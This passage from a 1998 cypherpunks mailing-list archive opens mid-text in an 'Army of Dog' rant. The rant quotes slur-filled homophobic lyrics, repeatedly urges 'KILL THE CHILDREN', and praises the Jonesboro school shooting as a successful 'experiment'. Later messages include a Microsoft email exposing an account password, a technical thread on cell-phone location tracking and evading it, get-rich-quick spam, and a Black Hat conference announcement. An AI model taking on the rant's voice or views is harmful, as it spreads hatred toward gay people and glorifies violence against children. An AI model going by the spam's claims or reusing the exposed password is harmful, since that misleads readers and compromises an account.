teeth, that the Space Aliens who Hide His Drugs are sending him their
secret messages by communicating with him through the new Electronic
Reality (TM) based on TV-DNA and InterNet-RNA.
  "The problem is not an overpopulation of *geese*, but an
overpopulation of *people*"


Excerpt from "Save The Tiger" (c) 1978 C.J. Parker:
  "As Jack Lemmon kicked in a contribution to help save a dying breed
similar to himself, I realized that the Tiger did OK for tens of
thousands of years, until man got in the way, so that the true solution
to saving the Tiger was to kill all of mankind.
  "So I wrote a group-participation song dedicated to spreading hate and
dissension amoung those listening to it, and the crowd participates, not
just by singing, but also by killing each other at the end of the song."
	"The people on your right are homosexual,
	The guys have long nails and think they're intellectual,
	The women, they are dikes, and their friends all call them Spike,
	And they hang around our schoolyards late at night...
	  "They've won the right to teach school to our children,
	   And they'll turn them into faggots by the million,
	   Till the day will finally come, when you have to guard your bum,
	   With a K-Tel mail-order Asshole Protector,
	   Or your front, with a K-Tel Double-Dong Rejector.
	"Sing, Oh-Oh-Oh, you Dirty Mother,
	I've hated you from the first day that we met,
	And you know I won't get high, until I see you die,
	A slow and painful, unnatural death.
	   "And we can still Save The Tiger, my friend, it's not too late,
	   If we all get together, and show a little hate."


  It is blatantly obvious that the CyberLamers incapable of buying the
slightest clue as to the true nature of the forces set in motion at 9:02
a.m., 19 April, 1998, are reduced to intercepting the Messages From Mars
directed toward the Author's Digital Implant, and replacing them with
subliminal messages certain to lead her to the conclusion that, if
Freedom, Liberty and Privacy are becoming an endangered species, due to
their being attacked by the selfish needs of Innocent Children (TM),
then the answer to 'preserving' Freedom, Liberty and Privacy is to KILL
all of the Innocent Children.

  Thanks to the efforts of A DANGEROUSLY CRAZED VIOLENT PSYCHO KILLER TO
BE NAMED LATER, an Army of Dog, Cult of One veteran who risked bodily
harm in a night spent physically destroying most of his personal
property, even putting his head through the gyproc and pressed-glue
panelling of his home, the blood dripping from his chin onto his
keyboard, combined with the output of a million spilled Scotch and coke
drinks, wrote:
   "The only way to preserve Freedom, Liberty and Privacy in the world
is to KILL THE CHILDREN!!! who are responsible for the attacks on the
Constitution which are designed to 'protect' the Innocent Children.
   "Since it is imperative to KILL them  all, and let Dog sort them
out,  in order to uphold the concept that it is better for ten guilty
children to die, than for one innnocent child to wrongly be allowed to
live, the only way to truly 'save' a child is, therefore, to destroy
that child's innocence.
  "Those who are hesitant to do everything possible to crush the human
spirit of innocent children until they strike out savagely by committing
crimes so horrifying that society will allow them to be tried as
'adults', or those who hesitate to make every effort to put an end to
childhood innocence by forcing the children to face Reality (TM),
instead of The Fairy Tale That Passes For History--Past, Present and
Future (TM), should remind themselves that, If It Saves The Life Of A
Single Child..."

  The Army of Dog, MeatSpace Division, experiment performed recently in
Jonesboro by two young Army of Dog Warriors, has proven successful in
moving the two out of the line of fire in the battle being waged over
the lives and souls of Innocent Children, and has placed them under the
protective mantle which ensures that those convicted of murder as adults
will live a long and healthy life during the appeals process.

  One wonderful aspect of the KILL THE CHILDREN!!! approach to
preserving Freedom, Liberty and Privacy is that it has the potential to
unite the government and the citizens together in a common cause to
remove the pressing need to Destroy the Constitution in order to Save
the Children.
  The children who died in the bombing of the Murrah Federal Building in
Oklahoma City certainly have no further need of 'protection' by taking
away the Constitutional rights of their parents. The children who died
in the slaughter of non-mainstream religion worshippers at Waco
certainly have no need of further 'protection' by taking away the
weapons the Constitution allows citizens to possess in order to defend
themselves against religious persecution and government oppression.

  Those who have an interest in the preservation of Freedom, Liberty and
Privacy should make every effort to support the efforts of the New World
Order to gain access to all communications on the face of the earth, as
well as placing video surveillance systems in all public and private
areas, so that both Innocent Children and UnIndicted Adults can be
proven beyond doubt to be Felons Under An Increasing Number Of Laws,
thus negating the need for their Constitutional Rights to be taken away
in order to 'protect' them from the Bad People (TM).

"When Innocence is Outlawed, Nobody will be Innocent."
~ A Platitude To Be Named Later

  Since it may prove impossible for Defenders of the Constitution to
encourage massive numbers of children to committ Adult Crimes, without
overwhelming the legal system, every effort should be made to destroy
the childhood innocence of as many children as possible by helping them
to break through the deadly facade of Offically Recognized Mainstream
Reality, and realize that their inherent birthright of Constitutional
Rights makes them terrorist criminals at war with their government.

  Children, unlike Adults, are still capable of recognizing that the
screams of the babies, as their voluntary-mandatory SSN is slapped on
their butts at birth, are a newborn's way of announcing to the whole
world that...

			THE REVOLUTION IS *NOW*!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mscompia@microsoft.com
Date: Wed, 22 Apr 1998 08:38:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Information From The Microsoft Personal Information Center
Message-ID: <02bbb4437151648UPIMSSMTPSYS08@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is your password you requested from the Microsoft Personal Information Center at http://register.microsoft.com/regwiz/personalinfo.asp.

Password: writecode

If you continue to have access problems or want to report other issues, please contact us through the Write Us button at the top of any Microsoft page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Wed, 22 Apr 1998 10:28:44 -0700 (PDT)
To: vermont@gate.net
Subject: Re: Position escrow (triangulation, cell "remailers")
In-Reply-To: <Pine.LNX.3.96.980422021922.136K-100000@oto.gate.net>
Message-ID: <199804221728.KAA25486@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>Wasn't Kevin Mitnick tracked down by triangulating the location of his
>cell phone?  If the feds (or whoever) want to find someone's signal, it

Yes, but it was a very time-consuming manual process. *Any* radio
signal can be located in this way. As a sport, radio hams have long
conducted "fox hunts", aka "hidden transmitter hunts", where somebody
hides with a transmitter and the rest try to find him. Mitnick was
found with classic ham-style fox-hunting techniques. His level of
activity was so high that he made it relatively easy.

Nothing really can thwart this method, other than never using your
phone.  Its saving grace for our purposes is that it is so labor
intensive that it cannot be done routinely.

>If someone wanted to passively track everyone's position all the time,
>there would need to be at least two direction-sensitive cell towers

Almost. In CDMA, the mobile station locks its timing to the base
station.  This lets the base station easily measure the round trip
time through the mobile and back and thereby the radial distance. With
just one base station, you can locate the user to a circle around the
base station.  Defeating this is what I had in mind yesterday when I
talked about dithering the mobile timebase a la Selective
Availability.

Somebody then pointed out in private email that dithering wouldn't
defeat a differential timing measurement made by two or more base
stations. This is true, but these measurements are easily made only
when the mobile is in soft handoff (talking to two base stations at
once).  In CDMA, as in other digital cellular systems, handoffs are
"mobile assisted".  That is, the base station relies on "pilot
strength measurement" reports from the mobile as to which neighboring
cells it can hear so handoffs can be set up. If you hack the phone
software to lie about these measurements, you can keep handoffs from
being set up.  Your service quality will definitely suffer, especially
in the border regions between adjacent cells, but you will make it
much harder (but still not impossible) for them to locate you.

In analog, handoffs during calls are performed entirely by special
scanners in each base station. The mobiles do not assist the
process. Having only one receiver channel, they cannot look for
adjacent base stations while in a call.  CDMA receivers can do this
because they have a "searcher" channel whose sole function is to look
for pilot energy from any base station in range. While it would still
be possible for CDMA base stations to cooperate as analog stations now
do in locating an "uncooperative" mobile, this is not something that
could be done routinely. There are also near-far considerations
because every cell transmits on the same forward channel and every
mobile transmits on the same reverse channel, and tight power control
is used on both links to minimize co-channel interference.

Phil








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Wed, 22 Apr 1998 10:33:48 -0700 (PDT)
To: vermont@gate.net
Subject: Re: Position escrow (triangulation, cell "remailers")
In-Reply-To: <Pine.LNX.3.96.980422021922.136K-100000@oto.gate.net>
Message-ID: <199804221733.KAA25507@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>On cell "remailers": Why resend the cell signal?  Why not instead set up a
>generic phone call resender, which could be used by cell users and
>non-users alike?  As long as you use the call resender for all of your
>important calls, the feds (and others) will find it very difficult to
>figure out what cell phone ID to triangulate or home phone number to tap

Exactly. And I think this brings the remailing concept full
circle. Wasn't the basic idea invented for telephones way back in
(alcohol) Prohibition days? As I recall, a device called a "cheesebox"
connected two phone lines. When a call came in on one line, it went
back out on the other. You'd place a cheesebox in some third party's
back room, e.g., a restaurant owner who was paid for the privilege and
to keep his mouth shut. If the cops traced a call, it would lead them
to the restaurant owner, who would tip off the bootleggers.

Does anyone have any historical references for these things? I think it
would be fun to see how an earlier age made use of anonymous remailers
based on a much simpler technology.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Wed, 22 Apr 1998 11:16:33 -0700 (PDT)
To: Lucky Green <karn@Qualcomm.com>
Subject: Re: Position escrow
In-Reply-To: <199804212208.PAA22084@servo.qualcomm.com>
Message-ID: <3.0.3.32.19980422104042.02f10a40@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 04:43 PM 4/21/98 -0700, Lucky Green wrote:
>On Tue, 21 Apr 1998, Phil Karn wrote:
>
>> This is a really difficult issue. Even the most diehard cypherpunk
>> cannot doubt the usefulness of a cellular position reporting
>> capability in an emergency situation, when the user *wants* the cops
>> or whoever to know where he is.  The big problem is how to keep it
>> from being used (or abused) for "law enforcement" purposes without the
>> consent of the user.
>
>Usfull != good idea. If the information is available for some purposes, 
>it is, or soon will, become available for other purposes. The only way to 
>prevent this is to not make the information available for *any* purpose.
>
>I gladly take the cellphone without 911 locator over the cellphone with 
>24/7 postion escrow. Furthermore, I content that there is no middle 
>ground between the two. Assuming of course the phone doesn't have an 
>active locator device that can be enabled using a special 911 button.
>
>YMMV.

Regardless of the type of phone, the cell stations can be designed to do
time-of-arrival comparisons on the signal transmitted from the phone and
calculate a reasonably accurate position.  If you don't want your location
known, don't transmit.


-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNT4rmMJF0kXqpw3MEQJLDACeNIUGb/troVJOuJhvX1g4z8itgdsAoLPX
WehkE2KpV3BTm9Z5w00ktqI4
=KzUa
-----END PGP SIGNATURE-----


Jonathan Wienke

PGP Key Fingerprints:
7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC

Proud to be a charter member of the vast right-wing conspiracy!

RSA export-o-matic:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Wed, 22 Apr 1998 13:17:49 -0700 (PDT)
To: Dan Geer <karn@qualcomm.com>
Subject: Re: Position escrow
In-Reply-To: <199804212208.PAA22084@servo.qualcomm.com>
Message-ID: <v03110713b16406e293aa@[207.94.249.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:01 PM -0800 4/21/98, Dan Geer wrote:
>    This is a really difficult issue.
>
>And how.
>
>How does this interact with phones whose
>access (telephone) number is non-unique?
>Could where I am calling from be divorced
>from what instrument I am using to call?
>Is there a parallel between smearing the
>signal over a spectrum of radio frequencies
>and smearing the identifying information
>over a spectrum of numbers? Could calls
>to 911 carry no phone number but just
>"here I am" information -- a panic button
>function, in other words?

Part of the problem in devising technical fixes for this problem is that
the technology needs some idea of position in order to operate.  Even if we
keep it to, "somewhere in cell X", there is incentive to make cells smaller
as usage increases.

One interesting, but unlikely possibility is an originate-only phone which
pays for calls with cash (e.g. Digicash, or a prepaid phone activation
card).  Since it can't receive calls, it doesn't need an identity.  What
would come out of the system is, "Someone in cell X called telephone number
Y."


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Wed, 22 Apr 1998 13:49:37 -0700 (PDT)
To: frantz@netcom.com
Subject: Re: Position escrow
In-Reply-To: <v03110713b16406e293aa@[207.94.249.80]>
Message-ID: <199804222049.NAA26335@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>Part of the problem in devising technical fixes for this problem is that
>the technology needs some idea of position in order to operate.  Even if we
>keep it to, "somewhere in cell X", there is incentive to make cells smaller
>as usage increases.

Very true.

>One interesting, but unlikely possibility is an originate-only phone which
>pays for calls with cash (e.g. Digicash, or a prepaid phone activation
>card).  Since it can't receive calls, it doesn't need an identity.  What
>would come out of the system is, "Someone in cell X called telephone number
>Y."

There's already a way to do this: cloning. This is not always done
just to avoid paying for service.  Certain cloners are entirely able
and willing to pay for cellular service, but they demand anonymity.

Somebody should point out to the carriers that they could get rid of
much of the incentive to clone phones if they simply offered a
legit way to remain anonymous.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Success@mauimail.com
Date: Wed, 22 Apr 1998 14:52:08 -0700 (PDT)
To: associates@success1.com
Subject: express mail
Message-ID: <199804222145.QAA00500@sparc.isl.net>
MIME-Version: 1.0
Content-Type: text/plain



You just stumbled upon something big !


Pt or FT !No competition !No selling ! Not MLM !

$1,000 - $5,000 per week from home, within 30 days !

Daily conference calls !

Complete training and support !

Leads available !

Dear Friend,

	If your tired of the hype , then read on :

Everyone wants more and we have the system that can get it......

Over 20,000 doctors, lawyers, CPA's and business people, last year alone, started using our system to create wealth in their spare time.
 Many are making in excess of $50,000 per month. Speak to them yourself ! 

" I'm a chiropractor in Hawaii and use this system in my spare time to consistently make over $4,000 per week !"  Michael F. Makawao, HI

" I'm a single nurse and mom with 5 kids, have been using the system for 18 months,and last year alone, earned $400,000 !  " Melissa F., Parkersburg, IA

" I was a practicing priest for many years, retired and started using this system. Last week I earned $33,000 and bought my wife a new van - CASH " Jim P., Port Angeles, WA

These people were taught how to turn a one time investment into big money !
Is the timing right for you ?Find out on our discovery call. Risk free and pressure free !

800 286 9670 

To have your name removed form our list, send an email with remove in subject to removeme@postmaster.co.uk. We filter against all universal remove lists.

You just stumbled upon something big !


Pt or FT !No competition !No selling ! Not MLM !

$1,000 - $5,000 per week from home, within 30 days !

Daily conference calls !

Complete training and support !

Leads available !

Dear Friend,

	If your tired of the hype , then read on :

Everyone wants more and we have the system that can get it......

Over 20,000 doctors, lawyers, CPA's and business people, last year alone, started using our system to create wealth in their spare time.
 Many are making in excess of $50,000 per month. Speak to them yourself ! 

" I'm a chiropractor in Hawaii and use this system in my spare time to consistently make over $4,000 per week !"  Michael F. Makawao, HI

" I'm a single nurse and mom with 5 kids, have been using the system for 18 months,and last year alone, earned $400,000 !  " Melissa F., Parkersburg, IA

" I was a practicing priest for many years, retired and started using this system. Last week I earned $33,000 and bought my wife a new van - CASH " Jim P., Port Angeles, WA

These people were taught how to turn a one time investment into big money !
Is the timing right for you ?Find out on our discovery call. Risk free and pressure free !

1 800 452 4981   Outside the U.S. 1 619 678 4227 ext. 0630

To have your name removed form our list, send an email with remove in subject to asedrick@usa.net. We filter against all universal remove lists.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Wed, 22 Apr 1998 18:34:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Network Security Solutions Conference Announcement
Message-ID: <199804230133.UAA24801@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


         Network Security Solutions Conference Announcement

                July 29th and 30th, Las Vegas Nevada


******************  Call For Papers Announcement ***************************

Network Security Solutions is now accepting papers for its 1998
event. Papers and requests to speak will be received and reviewed from
March 24th until June 1st.  Please submit an outline on a self selected
topic covering either the problems or solutions surrounding network
security.  Topics of interest include Intrusion Detection Systems (IDS),
distributed languages, network design, authentication systems, perimeter
protection, and more.  Talks will be an hour with a half hour for Q&A.
There will be LCD projectors, overhead, and slide projectors.

Updated announcements will be posted to newsgroups, security mailing lists,
email, or visit the website at http://www.blackhat.com/

Current speakers include:

Marcus Ranum, Network Flight Recorder CEO.
Bruce Schneier, Counterpane Systems CEO.
Ira Winkler, president of the Information Security Advisory Group.
Theo DeRaadt, OpenBSD Lead Developer.
Tom Ptacek, Secure Networks Inc.
Scott Waddell, Cisco-Wheelgroup corporation.
Dominique Brezinski, Network Security Professional at Secure Computing Corp.
Peter Shipley, Independent Security consultant.
Richard Thieme, Thiemeworks, Inc.
Winn Schwartau, Interpact Inc.
Dr. Mudge, L0pht Heavy Industries administrator.
Ray Kaplan, Meet the Enemy panel discussion, Q&A.
Jennifer Granick, Attorney at law.


****************************************************************************

It's late. You're in the office alone, catching up on database
administration.  Behind you, your network servers hum along quietly,
reliably.  Life is good.  No one can get to your data or disrupt your WAN.
The network is secure.  Or is it?

The Network Security Solutions conference has been organized to put an end
to concerns like these.  While many conferences focus on information and
network security, only Network Security Solutions will put your engineers
and software programmers face-to-face with today's cutting edge computer
security experts and "underground" security specialists.

Only the Network Security Solutions conference will provide your people
with the tools and understanding they need to thwart those lurking in the
shadows of your firewall.

The reality is, they are out there.  The choice is yours.  You can live in
fear of them.  Or, you can learn from them.

****************************************************************************
                          Conference Overview

The Network Security Solutions Summer '98 conference (Formerly known as The
Black Hat Briefings) was created to fill the need of computer professionals
to better understand the security risks to their computer and information
infrastructures by potential threats.  To do this we assemble a group of
vendor-neutral security professionals in the same room and let them talk
candidly about the problems businesses face, and the solutions they see to
those problems.  No gimmicks, just straight talk by people who make it
their business to explore the ever changing security space.


Spanning two days with two separate tracks, Network Security Solutions will
focus on the vital security issues facing organizations with large
Enterprise networks and mixed network operating systems.  Topics will
include Intrusion Detection Systems (IDS), denial of service attacks and
responses, secure programming techniques and tool selection for creating
and effectively monitoring secure networks.

NSS's intense sessions will bring to light the security and
misconfiguration problems confronting organizations and network
administrators, most of which go unnoticed by today's preoccupied system
admins where security gets put off in lieu of constant network growth and
upgrades.  Our experts will discuss the strategies involved in correcting
existing problems and any problems on the horizon.

Current Intrusion Detection Systems and strategies will be covered so that
attendees may learn how to stop these problems before they occur.  CIO's
are welcome, but they should bring the people implementing their network
strategies and building their applications, because this conference is
for them.

****************************************************************************
                                Speakers 

There will be 18-20 speakers covering two tracks speaking over two days.
Speeches will be more technically oriented and last 1 1/2 hours each.  The
goal of the talks are to inform the audience with quality current state
system vulnerabilities and fixes.  Because of our unique speakers NSS will
offer the audience a deep insight into the real security issues facing your
network with no vendor pitches.

                            Wednesday, July 29th

08:30 - 09:00   Breakfast

09:00 - 09:45   Keynote Address: Marcus Ranum - How to REALLY secure the
                                 Internet.

10:00 - 11:30   Track A  Richard Thieme - Convergence -- Every Man (and
                         Woman) a Spy. 

                Track B  Dominique Brezinski - Penetrating NT Networks
                         Through Information Leaks and Policy Weaknesses.

11:40 - 13:10   Track A  Ira Winkler - Information Security: Beyond the
                         Hype.

                Track B  Theo DeRaadt - A discussion of secure coding
                         issues, problems with maintaining OS source trees,
                         and secure program design philosophies.

13:20 - 14:20   Lunch

14:25 - 15:20   Ray Kaplan: Meet the Enemy Session.

15:30 - 17:00   Track A  [Empty]

                Track B  Scott Waddell - 



                            Thursday, July 10th

09:00 - 09:45   Keynote Address: Bruce Schneier - Mistakes and Blunders:
                                 A Hacker Looks at Cryptography.

10:00 - 11:30   Track A	[Empty]

                Track B  Dr. Mudge - Real world VPN implementation
                         problems.


11:40 - 13:10   Track A  Jennifer Granick - 

                Track B  Peter Shipley - An overview of a 2 year effort
                         in massive multi-modem wardialing.

13:20 - 14:20   Lunch 


14:25 - 15:20   Panel 1  The benefits and problems of commercial security
                         software.  This panel of 5 people and moderator
                         will explore what products work, and what doesn't
                         in specific applications. Q&A.

                Panel 2  The Merits of Intrusion Testing - What is the
                         benefit of having people break into your network.
                         A panel 5 people.

15:30 - 17:00   Track A  Winn Schwartau - 

                Track B  Tom Ptacek - Problems with Intrusion Detection
                         Systems.

****************************************************************************
                     Speaker Topics and Biographies

- - MARCUS RANUM, President and CEO of Network Flight Recorder, Inc.
How to REALLY secure the Internet. Is it possible to really secure the
Internet? With current technology and methods, the answer would appear
to be a resounding "no." We've tried security through stepwise refinement
and security through consensus - the best remaining solutions are
totalitarian and draconian.  Marcus will present an outline for how the
Internet could be secured through some simple, cost effective methods.
He'll also explain why it won't happen.

Marcus Ranum is CEO of Network Flight Recorder, Inc., and has been
specializing in Internet security since he built the first commercial
firewall product in 1989. He has acted as chief architect and implementor
of several other notable security systems including the TIS firewall
toolkit, TIS Gauntlet firewall, whitehouse.gov, and the Network Flight
Recorder. Marcus frequently lectures on Internet security issues, and
is co-author of the "Web Site Security Sourcebook" with Avi Rubin and
Dan Geer, published by John Wiley and Sons. 
                          
- - BRUCE SCHNEIER, President of Counterpane Systems and author of Applied
Cryptography.  Mistakes and Blunders: A Hacker Looks at Cryptography.
- From encryption to digital signatures to electronic commerce to secure
voting--cryptography has become the enabling technology that allows us
to take existing business and social constructs and move them to computer
networks.  But a lot of cryptography is bad, and the problem with bad
cryptography is that it looks just like good cryptography; most people
cannot tell the difference.  Security is a chain: only as strong as the
weakest link.  In this talk I'll examine some of the common mistakes
companies make implementing cryptography, and give tips on how to avoid
them.  

Bruce Schneier is President of Counterpane Systems, the author of
Applied Cryptography, and the inventor the Blowfish algorithm.  He
serves on the board of the International Association for Cryptologic
Research and the Electronic Privacy Information Center.  He is a
contributing editor to Dr. Dobb's Journal, and a frequent writer and
lecturer on cryptography.
                          
- - THEO DERAADT, Lead developer of OpenBSD. 
A discussion of secure coding issues, problems with maintaining OS
source trees, and secure program design philosophies.  Regular systems

software has many security problems.  A number of approaches at auditing
and repairing these problems have been developed as a result of the
OpenBSD project.

Theo de Raadt heads the OpenBSD project.  This 4.4BSD derived operating

system project has increasingly placed its focus on discovery and
repair of security issues.  Due to a 2 year auditing process by a
10-member team, OpenBSD is probably the most secure operating system
in common use today.  For more information, see
http://www.OpenBSD.org/security.html
                         
- - IRA WINKLER, President of the Information Security Advisory Group. 
Information Security: Beyond the Hype If you read the headlines today,
you would think that no matter what people are doing to secure themselves,
they will never be secure.  The reason this idea comes across is
that the media focuses on the threats and stories about unstoppable
geniuses that can compromise even the Pentagon. The truth is that you
can protect yourself from even the most diabolical genius.  This
presentation discusses Information Security from a Risk based perspective.
The threats to your systems are discussed, but more important the
vulnerabilities that actually allow the threats to compromise your
systems are discussed.  Using that information, you can then choose the
countermeasures you need to protect yourself and your organization.  This
presentation will show you that while there is no such thing as perfect
security, you can protect yourself from almost all of the most serious
threats.  Probably what is most valuable to attendees is guidance on how
to spend limited funding in the most efficient manner. 

Ira Winkler, CISSP is considered one of the world's leading experts on
Information Security, Information Warfare, investigating information
related crimes, and Industrial Espionage.  He is author of the book,
Corporate Espionage, and President of the Information Security Advisors
Group.  His clients include some of the largest companies and banks in
the world.  He is also a columnist for ZDTV with his column titled
SpyFiles.  He also functions as the network's security expert.  Previously,
Mr. Winkler was with the National Security Agency and was the Director of
Technology with the National Computer Security Association.  He has also
performed studies on Information Warfare for the Joint Chiefs of Staff. 

- - DOMINIQUE BREZINSKI, Network Security Professional at Secure Computing
Corporation. Penetrating NT Networks Through Information Leaks and Policy
Weaknesses.  The focus of this presentation will be a demonstration of how
Windows NT hosts can be queried for information and how the information
can be correlated to provide an attacker with a path of least resistance.
Even though many Windows NT networks have few remotely exploitable
technical vulnerabilities (buffer over-runs, flawed CGI scripts, address
based authentication etc.), most NT networks give away too much
information.  By analyzing the information it is easy to find policy
weaknesses that can be exploited to gain access to the NT hosts.  Custom
tools will be demonstrated on a small network. 


Dominique Brezinski is a Network Security Professional at Secure
Computing Corporation and has been concentrating on Windows NT and
TCP/IP network security issues for four years. Prior to working for
Secure Computing, Mr. Brezinski worked as a Research Engineer at
Internet Security Systems where he was responsible for finding new
vulnerabilities and security assessment techniques for Windows NT.  In
1996 Mr. Brezinski published a white paper entitled "A Weakness in
CIFS Authentication" which revealed a serious flaw in the
authentication protocol used in Windows NT (NT LM Security). It was
shown for the first time that an attacker could completely subvert
the network authentication in Windows NT to gain unauthorized access
to Windows NT servers. Mr. Brezinski has continued to demonstrate
advanced techniques for assessing the risks present in Windows NT
networks.   

- - RICHARD THIEME, Thiemeworks, Inc.  Convergence -- Every Man (and Woman)
a Spy.  Arbitrary digital interfaces - television, PCs, PDAs - are
converging, but that's only part of the story. The roles people play
in work and life are converging too. Intelligence agents, knowledge
managers for global corporations, competitive business intelligence
agents, sysadmins, hackers,  journalists, and CIOs are becoming
indistinguishable. Why does that matter? Because the ability to
synthesize and integrate information, manage complexity and ambiguity,
morph continually into roles appropriate to a shifting work context, and
somehow remember who you are - that's what matters most. Our
presentations of ourselves are the powerful levers that move mountains
in the digital world. Richard Thieme discusses why and how to do it.

Richard Thieme is a business consultant, writer, and professional speaker
focused on the human dimension of technology and the workplace. His
creative use of the Internet to reach global markets has earned accolades
around the world.  "Thieme knows whereof he speaks," wrote the Honolulu
Advertiser. He is "a prominent American techno-philosopher" according to
LAN Magazine (Australia), "a keen observer of hacker attitudes and 
behaviors" according to Le Monde (Paris), "one of the most creative minds
of the digital generation" according to the editors of Digital Delirium,
and "an online pundit of hacker culture" according to the L A Times.

Thieme's articles are published around the world and translated into
German, Chinese, Japanese and Indonesian. His weekly column, "Islands
in the Clickstream," is published by the Business Times of Singapore,
Convergence (Toronto), and South Africa Computer Magazine as well as
distributed to subscribers in 52 countries.

Recent clients include:  Arthur Andersen; Strong Capital Management;
System Planning Corporation; UOP; Wisconsin Power and Light; Firstar
Bank; Northwestern Mutual Life Insurance Co.; W. H. Brady Company;
Allstate Insurance; Intelligent Marketing; and the FBI.

- - RAY KAPLAN. Generally, "hackers" are regarded as criminals by the
"legitimate community."  Who are these "hackers" that seem to keep
whacking on our systems and networks? Are they merely scumbag reprobates
that should be purged from the society?  Is there anything to learn from

them?  This session is intended to introduce the two sides of the security
equation to one another in a forum which fosters open, detailed, honest
communication.  Bring your questions.

Who are the enemies of computer and network security?  What techniques do
they employ against us?  Are those that attack our  systems all just a
bunch of slime balls that are devoid of morals,  ethics, and common sense?
While in the minority of reported  computer crime statistics, the skilled
outsider still represents a  significant threat.  

This session explores who they are, their attitudes, their techniques, their
successes and their failures from the perspective of what we have to learn
from them to better protect your systems and networks.  This classic session
allows you to interact directly with members of the computer underground.
Join us for some stimulating conversation with those who computer security
professionals consider to be their enemies.  

Mr. Kaplan has been actively involved with system and network security as
a consultant for over half of his more than 20 years in the industry.
There is no question that he hacks.  However, he is not a criminal.  His
clients have included the world's largest financial institution, smallest
commodities broker and a wide variety of organizations, including
multinational and Fortune 100 companies from all segments of the economy,
and public institutions all over the world.  

Mr. Kaplan is a very prolific lecturer, instructor and writer.  He
consults, lectures and teaches technical system and network-related topics
all over the world.  His articles are frequently published in major computer
journals and magazines.  In over ten years of public speaking and
audio/video conference production, he has given over 2,000 technical,
tutorial-style presentations and lectures in forums such as professional
societies, seminars and his consulting.  As a frustrated inventor, he is
forever trying to rid the  world of inefficiency, frustration and waste by
pursuing new paradigms in the delivery of training, education and technical
information. 

- - PETER SHIPLEY - An overview of a 2 year effort in massive multi-modem
wardialing.  Security problems occur when obvious security problems are
overlooked.  One commonly overlooked problem is alternative access methods
to a corporate Intranet from an external machine. Many if not most
companies are overlooking their secondary vulnerabilities surrounding
alternate methods of  network access.

Mr. Shipley will present research covering an overview of a 2 year effort
in massive multi-modem wardialing.  His findings will include some personal
observations and the results obtained from scanning the San Francisco Bay
area.  When Mr. Shipley started this project he noted that there were no
published research references to wardialing or documented statistical
results of the types of equipment and computer networks commonly found
on the POTS (Plain old telephone system) network.  Mr. Shipley decided to
change that through his research.

Mr. Shipley Is an independent consultant in the San Francisco Bay Area with
nearly thirteen years experience in the Computer Security field.

Mr. Shipley is one of the few individuals who is well known and respected
in the professional world as well as the underground and hacker community.
He has extensive experience in system and network security as well as
programming and project design. Past and current clients include TRW, DHL,
Claris, USPS, Wells Fargo, and KPMG.  In the past Mr. Shipley has designed
Intranet banking applications for Wells Fargo, Firewall design and testing
for and, WWW server configuration and design for DHL.  Mr. Shipley's
specialties are third party penetration testing and firewall review,
computer risk assessment, and security training.  Mr. Shipley also performs
post intrusion analysis as well as expert witness testimony.   Mr. Shipley
is currently concentrating his efforts on completing several research
projects.

- - Thomas Ptacek, Network Security Professional at Secure Networks, Inc.
Defeating Network Intrusion Detection.
Network intrusion detection (ID), a technology that attempts to identify
attackers by monitoring network traffic, is fast becoming one of the hottest
products in the security market. Beneath the hype, however, lie some serious
concerns about the reliability of currently available ID systems, as well as
the fundamental techniques they use to collect information.  This talk will
explain why the most popular ID systems on the market can't be trusted,
demonstrate how to avoid detection by them, and, in the process, eliminate
some very widespread misunderstandings about the capabilities of sniffers
and intrusion detection systems. 

Thomas Ptacek is a developer at Secure Networks, Inc. His work focuses on
vulnerability assessment, which involves researching and testing network
systems for exploitable design and implementation flaws. In the course of
this work, his team has discovered some of the Internet's most serious
security problems, including vulnerabilities in Windows NT, Checkpoint
Firewall-1, and Solaris, as well as core Internet software such as the
BIND, INN, and Apache.
                         
- - DR. MUDGE, Administrator of the Boston L0pht Heavy Industries.
Real world VPN implementation security issues.

As one of the prominent members of the hacker group 'The L0pht', mudge has
been responsible for numerous advisories and tools in use in both the black
hat and white hat communities. L0phtcrack, the Windows NT password
decryptor - monkey, the S/Key password cracker, Solaris getopt() root
vulnerability, sendmail 8.7.5 root vulnerability, Kerberos 4 cracker,
and SecurID vulnerabilities are some of the recent offerings that mudge
has contributed to the security community. Mudge recently finished
cryptanalysis work with some of the top US cryptographers - papers
will be published within the next several months. The BBC, Wired
Magazine, Byte Magazine, and the Washington Post have all recently covered
mudge and the L0pht's ongoing projects.

- - SCOTT WADDELL, Cisco-Wheelgroup corporation.
  
****************************************************************************
                           Fees and Registration


